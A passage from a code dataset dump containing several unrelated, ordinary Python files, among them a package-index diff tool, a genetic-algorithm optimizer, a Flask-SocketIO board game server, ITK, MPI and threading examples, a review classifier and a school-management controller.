elif r.status_code in (400, 404):\n        # incorrect base url raises ConnectionError and plat and ver get\n        # validated via CLI - thus 404 likely indicates problem with org/repo.\n        print(\"HTTP 404 Error: Please double check your Repository settings.\")\n        print(\"Repository must be a valid org/repo combination.\")\n        r.raise_for_status()\n        sys.exit()\n    elif r.status_code in (500, 502, 503, 504):  # Brood internal errors\n        msg = \"HTTP 50* Error: Please verify that the EDS instance is up at {}\"\n        print(msg.format(url))\n        r.raise_for_status()\n        sys.exit()\n\n\ndef gen_full_index(url: str, org_repos: Tuple[str], plats: Tuple[str],\n                   pyvers: Tuple[str], output: str, sort: bool = True,\n                   legacy: bool = False) -> None:\n    \"\"\" Given a set of org/repo, platforms, and versions, generate a single\n    json file containing the entirety of the index representing these repos.\n\n    The most common usecase would be to collect the full index of the\n    end-user's enthought/free + enthought/gpl and potentially also\n    enthought/lgpl repos.\n    \"\"\"\n    full_index = {}\n    for org_repo in org_repos:\n        org, repo = org_repo.split(\"/\")\n        for plat in plats:\n            for ver in pyvers:\n                full_index.update(get_index(url,\n                                            org,\n                                            repo,\n                                            plat,\n                                            ver,\n                                            legacy))\n    to_json_file(full_index, output, sort=sort)\n\n\ndef index_diff(local_index: dict, remote_index: dict) -> dict:\n    \"\"\" Calculate the difference between two json brood indices.\n    Adapted from brood/brood/sync/egg_sync.py\n\n    Remove calculations for eggs to delete:\n    Unless user specifically requests that we remove unused or outdated eggs\n    we should make minimal changes to their local EDS instance.\n\n    Likewise, remove calculations for eggs to move\n    \"\"\"\n    local_index_set = set(local_index)\n    remote_index_set = set(remote_index)\n\n    missing_egg_names = remote_index_set - local_index_set\n    missing_egg_index = {key: remote_index[key]\n                         for key in missing_egg_names}\n\n    return {\"missing\": missing_egg_index}\n\n\ndef full_diff(local_idx_json: str, org_repos: Tuple[str],\n              plats: Tuple[str], vers: Tuple[str],\n              output: str,\n              sort: bool = True,\n              legacy: bool = False,\n              remote_url: str = \"https://packages.enthought.com\"):\n    \"\"\" Given set of org/repo/plat/ver, a local index file and remote EDS host,\n    calculate the full index diff and write to json file specified by the\n    parameter, output.\n\n    remote_url is left as an internally available parameter but not exposed\n    via the cli - in general we will target the enthought production url.\n    \"\"\"\n    local_idx = from_json_file(local_idx_json)\n    remote_idx = {}\n    for org_repo in org_repos:\n        for plat in plats:\n            for ver in vers:\n                org, repo = org_repo.split(\"/\")\n                remote_idx.update(get_index(remote_url,\n                                            org,\n                                            repo,\n                                            plat,\n                                            ver,\n                                            legacy))\n    diff = index_diff(local_idx, remote_idx)\n    to_json_file(diff, output, sort=sort)\n\n\ndef to_json_file(idx: dict, path: str, sort: bool = False) -> None:\n    \"\"\" Write index to file as json.\"\"\"\n    with open(path, 'w') as f:\n        json.dump(idx, f, sort_keys=sort)\n\n\ndef from_json_file(path: str) -> dict:\n    \"\"\" Read index from json file.\"\"\"\n    with open(path, 'r') as f:\n        return json.loads(f.read())\n\n\ndef merge_json(input_paths: Iterable[str], output) -> None:\n    \"\"\" Given list of paths to json indices, merge into one json file.\"\"\"\n    index = {}\n    for path in input_paths:\n        index.update(from_json_file(path))\n    to_json_file(index, output, sort=True)\n\n\nif __name__ == '__main__':\n    cli()\n","sub_path":"brood_diff/diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":13169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"72993150","text":"#!/usr/bin/env python\n\n\nfrom qmt.system import Structure\nfrom qmt.generator import Generator\nfrom qmt.ga import GA\nfrom qmt.serializer import Serializer\nfrom qmt.parser import Parser\nfrom qmt.timer import Timer\nfrom qmt.parser import Parser\n\nimport numpy as np\nimport os\n\nimport multiprocessing\nfrom pathos.multiprocessing import ProcessingPool as Pool\n\nimport coloredlogs, verboselogs\nimport copy\nimport matplotlib.pyplot as plt\nimport pickle\n\n# create logger\ncoloredlogs.install(level='INFO')\n\nlogger = verboselogs.VerboseLogger('qmt::runner ')\n\n# def threadedCall(structure, lead0, lead1):\n#     return structure.getCurrent(lead0, lead1, avg_chem_pot=2.7)\n\ndef getConductances(structure, lead0, lead1):\n    return structure.getValleyPolarizedCurrent(lead0, lead1)\n\ndef getNewStructure(parser, identifier):\n    return Structure(parser, identifier, [[identifier]])\n\ndef objectiveFunction(currents_0_1):\n    vectors = []\n    for v1 in currents_0_1:\n        vectors.append((np.abs((v1[1]) / (v1[0] + v1[1])), (np.abs((v1[0] + v1[1]) / v1[0]))))\n\n    data = np.array(vectors).reshape(len(vectors), 2)\n\n    return data\n\ndef main():\n    total_timer = Timer()\n    iteration_timer = Timer()\n    short_timer = Timer()\n    total_timer.start()\n\n    logger.success(' --- Welcome to the Kwantum Transmission Device Optimizer --- ')\n\n    parser = Parser()\n    pool = Pool(nodes=parser.config['n_cpus'])\n    logger.info('Running calculations with ' + str(parser.config['n_cpus']) + ' workers.')\n    \n    serializer = Serializer(parser)\n    ga = serializer.deserialize()\n    if ga is not None:\n        # continue from before\n        ga.resetParser(parser)\n        logger.success('Successfully loaded previous GA. Will continue previous calculation.')\n    else:\n        logger.info('GA starting from scratch.')\n        logger.info('Generating initial structures...')\n        short_timer.start()\n\n        \n        ga = GA(parser, objective_function=objectiveFunction)\n        structures = ga.generator.generateAll(pool=pool, seeds=np.random.randint(0, 2**32 - 1, parser.config['GA']['n_structures']))\n        ga.setNextGeneration(structures)\n        logger.success('Initial structures generated. Elapsed time: %s' % (short_timer.stop()))\n\n    #########################\n    # main loop here\n    #########################\n\n\n    while ga.generationNumber() < parser.getNIterations():\n\n        short_timer.start()\n        iteration_timer.start()\n        # print info about the upcoming calculation\n        ga.summarizeGeneration()\n\n        # get the structures we are going to run calculations on\n        structures = ga.getCurrentGeneration()\n\n        # plot the systems and save image to disk\n\n        try:\n            os.mkdir('output/gen_' + str(ga.generationNumber()).zfill(3))\n        except FileExistsError:\n            pass\n\n        for i, s in enumerate(structures):\n            s.visualizeSystem(args={'dpi': 600, 'file': 'output/' + 'gen_' + str(ga.generationNumber()).zfill(3) + '/gen_%03i_struct_%03i.png' % (ga.generationNumber(), i)})\n\n        # calculate currents and write them out to disk\n        currents_0_1 = pool.map(getConductances, structures, [0] * len(structures), [1] * len(structures))\n        \n        with open('output/currents_gen_' + str(ga.generationNumber()).zfill(3) + '.dat', 'w') as cf:\n            cf.write('# Currents (lead1-k\\', lead1-k)\\n')\n            for cs1 in currents_0_1:\n                cf.write('%0.20e\\t%0.20e\\n' % (cs1[0], cs1[1]))\n\n        # calculate the objective function\n        ga.calculate([currents_0_1])\n\n        structures = ga.rankGenerationWithSquare()\n        # for s, objs in zip(structures, ga.current_objectives):\n        #     print(s.identifier, objs)\n        logger.success('Calculations finished. Elapsed time: %s' % (short_timer.stop()))\n        # write gene variables and objective function parameters to file\n        ga.writePhaseSpace(structures)\n\n        ga.serializeStructures()\n\n\n        short_timer.start()\n        subset_limit = parser.config['GA']['random-step']['keep-best']\n        structures_subset = structures[:subset_limit]\n        new_structures = []\n        for i in range(len(structures) - subset_limit):\n            index = np.random.randint(subset_limit)\n            new_structures.append(structures_subset[index])\n        \n        # mutate the current generation\n        structures_modified = ga.generator.mutateAll(new_structures, pool=pool, seeds=np.random.randint(0, 2**32 - 1, len(new_structures)))\n\n        structures = structures_subset + structures_modified\n\n        ga.setNextGeneration(structures)\n        logger.success('Structures have been updated. Elapsed time: %s' % (short_timer.stop()))\n        # print how long it took and serialize the current GA\n        short_timer.start()\n        serializer.serialize(ga)\n        pickle.dump(ga.history, open('output/history.pkl', 'wb'))\n        logger.success('Generation %i completed. Elapsed time: %s' % (ga.generationNumber(), iteration_timer.stop()))\n\n    logger.success(' --- Elapsed time: %s ---' % (total_timer.stop()))\n\nif __name__ == '__main__':\n    main()\n","sub_path":"optimizeValleyFilter2LeadNanoribbon.py","file_name":"optimizeValleyFilter2LeadNanoribbon.py","file_ext":"py","file_size_in_byte":5094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"347837366","text":"from flask import Flask, render_template, session, redirect, request, copy_current_request_context, url_for\nfrom flask_socketio import SocketIO, emit, join_room, rooms, disconnect\nasync_mode = None\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app, async_mode=async_mode)\n\nusercount = 0\n\nboard = [\n    [0,0,0,0,0,0,0],\n    [0,0,0,0,0,0,0],\n    [0,0,0,0,0,0,0],\n    [0,0,0,0,0,0,0],\n    [0,0,0,0,0,0,0],\n    [0,0,0,0,0,0,0],\n    [0,0,0,0,0,0,0]\n]\n\n\n\nflag = 1\n\nimport random\ndef getRandGravity():\n    tmp = random.randint(0,3)\n    res = ''\n    if tmp == 0: res = 'N'\n    elif tmp == 1: res = 'S'\n    elif tmp == 2: res = 'W'\n    elif tmp == 3: res = 'E'\n\n    return res\n\ndef appplyGravity(board, gravityD):\n    if gravityD == 'W':\n        newBoard = [[0 for col in range(7)] for row in range(7)]\n        for i in range(0,7):\n            flag = 0\n            k = 0\n            for j in range(0, 7):\n                if board[i][j] != 0:\n                    flag = j\n                    break\n            for j in range(flag, 7):\n                newBoard[i][k] = board[i][j]\n                k += 1\n        return newBoard\n    if gravityD == 'E':\n        newBoard = [[0 for col in range(7)] for row in range(7)]\n        for i in range(0,7):\n            flag = 0\n            k = 6\n            for j in range(6, -1, -1):\n                if board[i][j] != 0:\n                    flag = j\n                    break\n            for j in range(flag, -1, -1):\n                newBoard[i][k] = board[i][j]\n                k -= 1\n        return newBoard\n    if gravityD == 'N':\n        newBoard = [[0 for col in range(7)] for row in range(7)]\n        for i in range(0,7):\n            flag = 0\n            k = 0\n            for j in range(0, 7):\n                if board[j][i] != 0:\n                    flag = j\n                    break\n            for j in range(flag, 7):\n                newBoard[k][i] = board[j][i]\n                k += 1\n        return newBoard\n    if gravityD == 'S':\n        newBoard = [[0 for col in range(7)] for row in range(7)]\n        for i in range(0,7):\n            flag = 0\n            k = 6\n            for j in range(6, -1, -1):\n                if board[j][i] != 0:\n                    flag = j\n                    break\n            for j in range(flag, -1, -1):\n                newBoard[k][i] = board[j][i]\n                k -= 1\n        return newBoard\n\ndef checkGameStatus(board):\n    flag = 0\n    # 가로세로 판정\n    for i in range(7):\n        for j in range(4):\n            if board[i][j] == board[i][j+1] and board[i][j] == board[i][j+2] and board[i][j] == board[i][j+3] and board[i][j] != 0:\n                flag = board[i][j]\n            if board[j][i] == board[j+1][i] and board[j][i] == board[j+2][i] and board[j][i] == board[j+3][i] and board[j][i] != 0:\n                flag = board[i][j]\n\n    # 우 하향 대각선 판정\n    for i in range(4):\n        for j in range(4):\n            if board[i][j] == board[i+1][j+1] and board[i][j] == board[i+2][j+2] and board[i][j] == board[i+3][j+3] and board[i][j] != 0:\n                flag = board[i][j]\n\n    # 좌 하향 대각선 판정\n    for i in range(0,4):\n        for j in range(3,7):\n            if board[i][j] == board[i+1][j-1] and board[i][j] == board[i+2][j-2] and board[i][j] == board[i+3][j-3] and board[i][j] != 0:\n                flag = board[i][j]\n\n    return flag\n\ngravity = getRandGravity()\n\n@app.before_request\ndef before_request():\n    if usercount == 2:\n        pass\n        #return \"X\"\n    \n@app.route('/')\ndef index():\n    return render_template('index.htm')\n\n@app.route('/close')\ndef close():\n    return redirect(url_for('close.htm'))\n\n@socketio.on('my_event', namespace='/test')\ndef test_message(message):\n    emit('my_response', {'data': message['data'], 'board': board, 'gravity': gravity})\n\n@socketio.on('join', namespace='/test')\ndef join(message):\n    join_room(message['room'])\n    emit('my_response', {'data': 'In rooms: '.join(rooms())})\n\n@socketio.on('my_room_event', namespace='/test')\ndef send_room_message(message):\n    global flag\n    if flag == 1: flag = 2\n    else: flag = 1   \n    data = message['data']\n    gravity = getRandGravity()\n    data = appplyGravity(data, gravity)\n    emit('my_response', {'data': message['data'], 'board': data, 'gravity': gravity, 'flag':flag}, room=message['room'])\n    \n@socketio.on('disconnect_request', namespace='/test')\ndef disconnect_request():\n    @copy_current_request_context\n    def can_disconnect():\n        disconnect()\n    emit('my_response', {'data': 'Disconnected!'}, callback=can_disconnect)\n\n@socketio.on('connect', namespace='/test')\ndef test_connect():\n    global usercount\n    print(usercount)\n    if usercount == 0 or usercount == 1:\n        emit('my_response', {'data': 'Connected', 'count': 0})\n        usercount += 1\n       \n    elif usercount == 2:\n        return \"X\"\n\n@socketio.on('disconnect', namespace='/test')\ndef test_disconnect():\n    global usercount\n    usercount -= 1\n    print('Client disconnected', request.sid)\n\nif __name__ == '__main__':\n    socketio.run(app)","sub_path":"back-end/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"15882485","text":"#!/usr/bin/env python\n\nimport itk\n\nDimension = 2\nPixelType = itk.ctype('unsigned char')\nImageType = itk.Image[PixelType, Dimension]\n\ndef CreateFixedImage(image):\n    start = itk.Index[Dimension]()\n    start.Fill(0)\n\n    size = itk.Size[Dimension]()\n    size.Fill(100)\n\n    region = itk.ImageRegion[Dimension]()\n    region.SetSize(size)\n    region.SetIndex(start)\n\n    image.SetRegions(region)\n    image.Allocate()\n    image.FillBuffer(0)\n\n    index = itk.Index[Dimension]()\n    for ii in range(10, 20):\n        for jj in range(10, 20):\n            index[0] = ii\n            index[1] = jj\n            image.SetPixel(index, 255)\n\n    writer = itk.ImageFileWriter.New(Input=image)\n    writer.SetFileName(\"fixed.png\")\n    writer.Update()\n\ndef CreateMovingImage(image):\n    start = itk.Index[Dimension]()\n    start.Fill(0)\n\n    size = itk.Size[Dimension]()\n    size.Fill(100)\n\n    region = itk.ImageRegion[Dimension]()\n    region.SetSize(size)\n    region.SetIndex(start)\n\n    image.SetRegions(region)\n    image.Allocate()\n    image.FillBuffer(0)\n\n    index = itk.Index[Dimension]()\n    for ii in range(50, 60):\n        for jj in range(50, 60):\n            index[0] = ii\n            index[1] = jj\n            image.SetPixel(index, 100)\n\n    writer = itk.ImageFileWriter.New(Input=image)\n    writer.SetFileName(\"moving.png\")\n    writer.Update()\n\nfixed_image = ImageType.New()\nCreateFixedImage(fixed_image)\n\nmoving_image = ImageType.New()\nCreateMovingImage(moving_image)\n\nVectorComponentType = itk.ctype('float')\nVectorType = itk.Vector[VectorComponentType, Dimension]\nDisplacementFieldType = itk.Image[VectorType, Dimension]\n\nRigid2DTransformType = itk.Rigid2DTransform[itk.D]\nlandmark_based_transform_initializer = \\\n        itk.LandmarkBasedTransformInitializer[itk.Transform[itk.D, Dimension,\n            Dimension]].New()\n\nLandmarkPointType = itk.Point[itk.D, Dimension]\nLandmarkContainerType = itk.vector[LandmarkPointType]\n\nfixed_landmarks = LandmarkContainerType()\nmoving_landmarks = LandmarkContainerType()\n\nfixed_point = LandmarkPointType()\nmoving_point = LandmarkPointType()\n\nfixed_point[0] = 10\nfixed_point[1] = 10\nmoving_point[0] = 50\nmoving_point[1] = 50\nfixed_landmarks.push_back(fixed_point)\nmoving_landmarks.push_back(moving_point)\n\nfixed_point[0] = 10\nfixed_point[1] = 20\nmoving_point[0] = 50\nmoving_point[1] = 60\nfixed_landmarks.push_back(fixed_point)\nmoving_landmarks.push_back(moving_point)\n\nfixed_point[0] = 20\nfixed_point[1] = 10\nmoving_point[0] = 60\nmoving_point[1] = 50\nfixed_landmarks.push_back(fixed_point)\nmoving_landmarks.push_back(moving_point)\n\nfixed_point[0] = 20\nfixed_point[1] = 20\nmoving_point[0] = 60\nmoving_point[1] = 60\nfixed_landmarks.push_back(fixed_point)\nmoving_landmarks.push_back(moving_point)\n\nlandmark_based_transform_initializer.SetFixedLandmarks(fixed_landmarks)\nlandmark_based_transform_initializer.SetMovingLandmarks(moving_landmarks)\n\ntransform = Rigid2DTransformType.New()\ntransform.SetIdentity()\nlandmark_based_transform_initializer.SetTransform(transform)\nlandmark_based_transform_initializer.InitializeTransform()\n\nresampler = itk.ResampleImageFilter.New(Input=moving_image)\nresampler.SetTransform(transform)\n# resampler.SetReferenceImage(fixed_image)\nresampler.SetSize(fixed_image.GetLargestPossibleRegion().GetSize())\nresampler.SetOutputOrigin(fixed_image.GetOrigin())\nresampler.SetOutputSpacing(fixed_image.GetSpacing())\nresampler.SetOutputDirection(fixed_image.GetDirection())\nresampler.SetDefaultPixelValue(200)\nresampler.UpdateLargestPossibleRegion()\n\nwriter = itk.ImageFileWriter.New(Input=resampler.GetOutput())\nwriter.SetFileName(\"output.png\")\nwriter.UpdateLargestPossibleRegion()\n","sub_path":"Comment/ITKWikiExamples/Registration/LandmarkBasedTransformInitializer.py","file_name":"LandmarkBasedTransformInitializer.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"409920140","text":"\"\"\"\nOne of the most important features among those provided by MPI is the point-to-point\ncommunication, which is a mechanism that enables data transmission between two\nprocesses: a process receiver, and process sender.\nThe Python module mpi4py enables point-to-point communication via two functions:\n    Comm.Send(data, process_destination) : This sends data to the destination\n        process identifid by its rank in the communicator group\n    Comm.Recv(process_source) : This receives data from the source process, which\n        is also identifid by its rank in the communicator group\nThe Comm parameter, which stands for communicator, defies the group of processes, that\nmay communicate through message passing:\n    comm = MPI.COMM_WORLD\n\"\"\"\n\nfrom mpi4py import MPI\n\ncomm = MPI.COMM_WORLD\nrank = comm.rank\nprint('my rank is:', rank)\n\nif rank == 0:\n    data = 100000000\n    destination_process = 4\n    comm.send(data, dest=destination_process)\n    print('sending data %s'%data + \" to process %d\"%destination_process)\n\nif rank == 1:\n    destination_process = 8\n    data = 'hello'\n    comm.send(data, dest=destination_process)\n    print('sending data %s'%data + \" to process %d\"%destination_process)\n\nif rank == 4:\n    data = comm.recv(source=0)\n    print('data received is = %s'%data)\n\nif rank == 8:\n    data = comm.recv(source=1)\n    print('data received is = %s'%data)\n\n# mpiexec -n 9 python ","sub_path":"ParallelProgramming/ProcessParallel/pointToPointCommunication_MPI.py","file_name":"pointToPointCommunication_MPI.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"580742175","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics import classification_report, f1_score\nfrom sklearn.model_selection import KFold\nfrom sklearn.linear_model import LogisticRegression\n\n# Load training data file\nrdf = pd.read_csv('Train.csv')\n\n# Remove rows without required features\nrdf = rdf[rdf['reviewText'].notna()]\nrdf = rdf[rdf['summary'].notna()]\nrdf = rdf[rdf['overall'].notna()]\n\n# A product is awesome if its average overall rating is greater than 4.5 stars\nproduct_is_awesome = lambda x: 1 if np.mean(x) > 4.5 else 0\nproddf = rdf.groupby('amazon-id').agg({'overall': product_is_awesome})\n\n# An individual review is awesome if its overall rating is 5 stars\nreview_is_awesome = lambda x: 1 if x == 5 else 0\nrdf['awesome'] = rdf['overall'].map(review_is_awesome)\n\n# We want to analyze both text fields as one\nrdf['text'] = rdf['reviewText'] + rdf['summary']\n\n# Train and test with 10-fold split\nf1s = []\nkf = KFold(n_splits=10)\nfor train_idx, test_idx in kf.split(proddf):\n    trainproddf = proddf.iloc[train_idx]\n    testproddf = proddf.iloc[test_idx]\n\n    # Aggregate all rows with reviews in the product dfs\n    traindf = rdf[rdf['amazon-id'].isin(trainproddf.index)]\n    testdf = rdf[rdf['amazon-id'].isin(testproddf.index)]\n\n    # Prepare sentiment analysis data\n    X_train = traindf['text']\n    X_test = testdf['text']\n    y_train = traindf['awesome']\n\n    # Transform text with TfidfVectorizer\n    tfv = TfidfVectorizer(ngram_range=(1,2))\n    X_train = tfv.fit_transform(X_train, y_train)\n    X_test = tfv.transform(X_test)\n\n    # Classify with logistic regression\n    lr = LogisticRegression(max_iter=10000, n_jobs=4)\n    lr.fit(X_train, y_train)\n    testdf['prediction'] = lr.predict(X_test)\n\n    # Products are predicted to be awesome if the average of review predictions is over 80%\n    prediction_is_awesome = lambda x: 1 if np.mean(x) > 0.80 else 0\n    prodpreddf = testdf.groupby('amazon-id').agg({'prediction': prediction_is_awesome})\n\n    print(classification_report(testproddf['overall'], prodpreddf['prediction']))\n    f1s.append(f1_score(testproddf['overall'], prodpreddf['prediction'], average='weighted'))\n\nprint(np.asarray(f1s).mean())\n\n    ","sub_path":"testing code/test_classify.py","file_name":"test_classify.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"253044828","text":"from sys import argv as args\r\nfrom copy import deepcopy\r\nfrom collections import deque\r\n\r\nstates = (\".\", \"|\", \"#\")\r\n\r\nivals = dict()\r\nivals[\"#\"] = 0\r\nivals[\".\"] = 0\r\nivals[\"|\"] = 0\r\n\r\ndef parseLine(l):\r\n\treturn tuple([states.index(c) for c in l])\r\n\r\nfile = open(\"input.txt\")\r\ninput = file.read()\r\nfile.close()\r\n\r\nsinput = \"\"\".#.#...|#.\r\n.....#|##|\r\n.|..|...#.\r\n..|#.....#\r\n#.#|||#|#|\r\n...#.||...\r\n.|....|...\r\n||...#|.#|\r\n|.||||..|.\r\n...#.|..|.\"\"\"\r\n\r\nvmap = [parseLine(l) for l in input.split(\"\\n\") if len(l) != 0]\r\nylen = len(vmap)\r\nxlen = len(vmap[0])\r\n\r\ndef getAt(x, y):\r\n\tif y < 0 or y >= ylen or x < 0 or x >= xlen:\r\n\t\treturn None\r\n\treturn vmap[y][x]\t\t\r\n\r\ndef next(x, y):\r\n\tv = vmap[y][x]\r\n\taround = list()\r\n\t[[around.append(getAt(x+i-1, y+j-1)) for j in range(3) if not (i == 1 and j == 1)] for i in range(3)]\r\n\tif v == 0:\r\n\t\tif len([v for v in around if v == 1]) >= 3:\r\n\t\t\treturn 1\r\n\telif v == 1:\r\n\t\tif len([v for v in around if v == 2]) >= 3:\r\n\t\t\treturn 2\r\n\telif v == 2:\r\n\t\tif len([v for v in around if v == 1]) < 1 or len([v for v in around if v == 2]) < 1:\r\n\t\t\treturn 0\r\n\treturn v\r\n\r\ndef getVals():\r\n\tvals = [0 for x in range(3)]\r\n\tfor y in range(ylen):\r\n\t\tfor x in range(xlen):\r\n\t\t\tvals[vmap[y][x]] += 1\r\n\treturn vals\r\n\r\ndef drawMap(cmap):\r\n\tfor y in range(ylen):\r\n\t\tprint(\"\".join([str(c) for c in cmap[y]]))\r\n\r\ndef iterate(n):\r\n\tglobal vmap\r\n\tfor i in range(n):\r\n\t\tomap = [deque() for y in range(ylen)]\r\n\t\tfor y in range(ylen):\r\n\t\t\tfor x in range(xlen):\r\n\t\t\t\tomap[y].append(next(x, y))\r\n\t\tvmap = omap\r\n\r\ndef getRes():\r\n\tvals = getVals()\r\n\treturn (vals[1] * vals[2])\r\n\r\ndef solve1():\r\n\tdrawMap(vmap)\r\n\titerate(10)\r\n\tvals = getVals()\t\r\n\tdrawMap(vmap)\r\n\tprint(vals[1] * vals[2])\r\n\treturn\r\n\r\ndef solve2():\r\n\titerate(1000)\r\n\tomap = deepcopy(vmap)\r\n\tcounter = 0\r\n\tstop = False\r\n\twhile not stop:\r\n\t\titerate(1)\r\n\t\tcounter += 1\r\n\t\tif vmap == omap:\r\n\t\t\tstop = True\r\n\r\n\tprint(counter)\r\n\tprint(getRes())\r\n\tdrawMap(vmap)\r\n\treturn\r\n\r\ndef main():\r\n\tif len(args) > 1:\r\n\t\tif args[1] == \"1\":\r\n\t\t\tsolve1()\r\n\t\telif args[1] == \"2\":\r\n\t\t\tsolve2()\r\n\r\nmain()\r\n","sub_path":"18/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"296375087","text":"\n'''\n    创建一个可执行线程需要两个要素:\n    线程对象。是threading模块线程类Thread所创建的对象。\n    线程体。是线程执行的函���。\n\n    提供线程体:\n    1、自定义函数作为线程体\n    2、继承Thread类重现run()方法\n\n    threading.Thread(target=None, name=None, args-())\n\n'''\n\nimport threading\nimport time\n\n# 线程体函数\ndef thread_body():\n    # 当前线程对象\n    t = threading.current_thread()\n    for n in range(5):\n        # 当前线程名\n        print('第{0}次执行线程{1}'.format(n, t.name))\n        # 线程休眠\n        time.sleep(1)\n    print('线程{0}执行完成!'.format(t.name))\n\n\n# 主函数\ndef main():\n    # 创建线程对象t1\n    t1 = threading.Thread(target=thread_body)\n    # 启动线程\n    t1.start()\n\n    # 创建线程对象t2\n    t2 = threading.Thread(target=thread_body)\n    # 启动线程\n    t2.start()\n\n\nif __name__ == '__main__':\n    main()\n\n","sub_path":"第三章 Python高级实用库与框架/part05 Python多线程编程/5-3 自定义函数作为线程体/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"373801217","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 29 20:49:37 2016\n\n@author: Methinee\n\"\"\"\nimport pandas as pd\n\ndf_file = pd.read_csv('../data/df_dropSub_less20.csv',delimiter=\",\", skip_blank_lines = True, \n                 error_bad_lines=False)\n                 \ndrop_naResult = df_file[df_file['4RESULT'] != 0]\ndrop_naResult.to_csv('../data'+'/df_dropSub_less20_dropNaResult.csv')","sub_path":"pae/forcast/src/create_dfmore20_dropNanResult.py","file_name":"create_dfmore20_dropNanResult.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"367365897","text":"\"\"\"Classes for forms related to organizations.\"\"\"\n\nfrom django.forms import ModelForm\n\nfrom organizations.models import Organization\n\n\nclass PopeOrganizationForm(ModelForm):\n    class Meta:\n        \"\"\"Meta default.\"\"\"\n        model = Organization\n        fields = [\n            'org_name',\n            'email',\n            'telephone',\n            'cep',\n            'neighbourhood',\n            'addr',\n            'additional_addr'\n        ]\n","sub_path":"organizations/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"132373236","text":"import traceback\n\nfrom models.assignment import Assignment\nfrom models.assignment_container import AssignmentContainer\nfrom models.group import Group\nfrom models.group_container import GroupContainer\nfrom models.student import Student\nfrom models.user_container import UserContainer\nfrom views.mentor_view import MentorView\n\n\nclass MentorController:\n\n    def __init__(self):\n        ...\n\n    def start(self):\n        \"\"\"\n        Starts controller\n\n        :return: None\n        \"\"\"\n        exit_program = False\n        while not exit_program:\n            try:\n                option = MentorView.display_menu()\n                if option == '1':\n                    self.show_students()\n                elif option == '2':\n                    self.add_assignment()\n                elif option == '3':\n                    self.show_assignments()\n                elif option == '4':\n                    self.grade_assignment()\n                elif option == '5':\n                    self.check_attendance()\n                elif option == '6':\n                    self.change_student_data()\n                elif option == '7':\n                    self.promote_user_to_student()\n                elif option == '8':\n                    self.edit_groups()\n                elif option == '9':\n                    self.edit_groups(False)\n                elif option == '0':\n                    exit_program = True\n                else:\n                    MentorView.show_invalid_input()\n            except IndexError:\n                MentorView.display_index_error()\n            except ValueError as error:\n                if 'invalid literal' in str(error):\n                    MentorView.show_invalid_input()\n                else:\n                    MentorView.display_date_error()\n            except AttributeError:\n                MentorView.display_group_exists()\n            except Exception:\n                tb = traceback.format_exc()\n                print(tb)\n                input()\n\n        UserContainer.get_instance().save_users_to_file()\n\n    def show_students(self):\n        \"\"\"\n        Displays students data\n\n        :return: None\n        \"\"\"\n        students_list = UserContainer.get_instance().get_students_list()\n        MentorView.display_students_list(students_list)\n\n    def show_assignments(self):\n        \"\"\"\n        Displsys assigments data\n\n        :return: None\n        \"\"\"\n        assignments = AssignmentContainer.get_instance().get_assignments_list()\n        MentorView.display_assignments(assignments)\n\n    def add_assignment(self):\n        \"\"\"\n        Adds new assigments\n\n        :return: None\n        \"\"\"\n        students_list = UserContainer.get_instance().get_students_list()\n        deadline, title, description = MentorView.return_assignment_values()\n        new_assignment = Assignment(deadline, title, description)\n        AssignmentContainer.get_instance().add_assignment(new_assignment)\n        for student in students_list:\n            student.add_student_assignment(deadline, title, description)\n\n    def grade_assignment(self):\n        \"\"\"\n        Adds grade to chosen assigment\n\n        :return: None\n        \"\"\"\n        students_list = UserContainer.get_instance().get_students_list()\n        if not students_list:\n            MentorView.display_not_enough_data()\n            return\n        student_index = MentorView.get_student_index(students_list)\n        student_index = int(student_index)\n        student = students_list[student_index]\n        assignment_index, grade = MentorView.get_grade_values(student)\n        students_list = UserContainer.get_instance().get_students_list()\n        students_list[student_index].assignments[assignment_index].grade = grade\n\n    def check_attendance(self):\n        \"\"\"\n        Checks if students from certain group are present and adds attendance count to group\n\n        :return: None\n        \"\"\"\n        groups = GroupContainer.get_instance().get_groups_list()\n        if groups:\n            group_index = MentorView.get_group_index(groups)\n            group_index = int(group_index)\n            group = groups[group_index]\n        else:\n            MentorView.display_not_enough_data()\n            return\n        group_students = GroupContainer.get_instance().get_group(group.name).get_student_list()\n        for student in group_students:\n            student_present = MentorView.get_presence(student)\n            if student_present:\n                student.attendance += 1\n        UserContainer.get_instance().save_users_to_file()\n        group.attendance_check_count += 1\n        GroupContainer.get_instance().save_groups_to_file()\n\n    def change_student_data(self):\n        \"\"\"\n        Edits student data\n\n        :return: None\n        \"\"\"\n        value_changing = True\n        students_list = UserContainer.get_instance().get_students_list()\n        if not students_list:\n            MentorView.display_not_enough_data()\n            return\n        student_index = MentorView.get_student_index(students_list)\n        student_index = int(student_index)\n        student = students_list[student_index]\n        while value_changing:\n            value_to_change = MentorView.get_student_value_to_change()\n            if value_to_change == '1':\n                student.login = 